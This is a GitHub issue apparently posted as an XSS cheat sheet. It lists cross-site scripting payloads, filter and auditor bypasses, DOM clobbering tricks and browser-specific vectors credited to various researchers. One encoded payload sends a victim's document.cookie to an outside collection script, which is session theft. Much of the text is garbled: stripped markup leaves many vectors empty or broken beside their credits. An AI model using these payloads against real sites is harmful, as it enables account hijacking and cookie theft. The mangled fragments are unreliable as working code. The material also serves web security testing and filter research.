lordhomea / aaaaaaaaaaa


a #4

Open lordhomea opened 4 years ago

lordhomea commented 4 years ago

XSS SECURITY PROBLEMS. COLLECTED BY @0x787373

STANDARD XSS VECTORS:

< script > < / script> &lt < &LT < < << <<< ">

<

'> '> ";alert('XSS');// %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E &ltscript&gtalert(document.cookie); &ltscript&gtalert(document.cookie);&ltscript&gtalert

"> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>!--=&{} '';!--"=&{()} ','')); phpinfo(); exit;/* var n=0;while(true){n;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> SCRIPT]]>alert('XSS');/SCRIPT]]> ]]> <IMG SRC="javascript:alert('XSS')"> ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ TWITTER @xssvector Tweets: Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.' Reverse 401 basic auth phishing by @jackmasa POC: document.domain='com' chrome/safari same domain suffix cross-domain trick. Safari empty location bar bug by @jackmasa POC: Safari location object pollution tech: by @kinugawamasato Safari URL spoofing about://mmme.me POC: Opera URL spoofing vuln data://mmme.me by @jackmasa POC: Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F Opera data:message/rfc822 #XSS by @insertScript #IE IE cool expression xss
Clever webkit xss auditor bypass trick and %c0″//(%000000%0dalert(1)// #IE #0day new XMLHttpRequest().open("GET", "data:text/html,", false); #firefox #datauri

XSS

#firefox #IE "clickme #IE #xssfilter @kinugawamasato Components.lookupMethod(self, 'alert')(1) #firefox external.NavigateAndFind(' ',[],[]) #IE #URLredirect IE decides charset as #utf-7 @hasegawayosuke #opera #chrome #IE9 #svg #vbscript setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox #svg Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera URL-redirect vuln == XSS ! Location:data:text/html, #Opera @jackmasa click​ #Chrome #XSS @RSnake Clipboard-hijack without script and css: http://elgoog.com Opera:aaa $=<>@mozilla.org/js/function;$::[<>alert](/@superevr/) #firefox Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa #Firefox #JustForFun Just don't support IE click evil/# #E4X <{alert(1)}>.(alert(3)).@wtf.(wtf) by @garethheyes #vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356 ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')() No referer : ​ #VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub] if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console #Firefox #Opera #Chrome #Safari #XSS document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS header('Refresh: 0;url=javascript:alert(1)'); click #CSS expression #ES #FF for(location of ['javascript:alert(/ff/)']); #E4X function::['location']='javascript'':alert(/FF/)' HTML5 entity char test #Firefox click by @cgvwzq
CSS and CSS :P toUpperCase XSS document.write('<ı onclıck=alert(1)>asd'.toUpperCase()) by @jackmasa IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val(" by @0x6D6172696F DOM clobbering:
clobbered location object on IE. DOM clobbering: clobbered document->body by @jackmasa Classic IE backtick DOM XSS: ``onerror=alert(1) Firefox click=>google by @garethheyes click by @kkotowicz Opera click variant base64 encode. by @jackmasa Opera by LeverOne H5SC#88 Webkit and Opera click by @kkotowicz FF click url trick by @jackmasa IE @thornmaker , @sirdarckcat IE less xss,20 chars. by @0x6D6172696F click no referrer by @sneak_ FF no referrer by @sneak_ No dos expression vector by @jackmasa by @0x6D6172696F JSLR( @garethheyes ) challenge result: @irsdl challenge result: Vbscript XHR by @masa141421356 XML Entity XSS by @garethheyes Webkit cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa </xmp><img src=xx:x onerror=alert(1)// Classic vector by slacker :D name Classic html entity inject vector A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript Upload a jar file => Firefox XSS by @0x6D6172696F JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke IE6-7 Inject vector by @kinugawamasato IE UTF7 BOM XSS by @garethheyes by @0x6D6172696F , @jackmasa Opera SVG animation vector by @0x6D6172696F by @garethheyes FF CLICK by @0x6D6172696F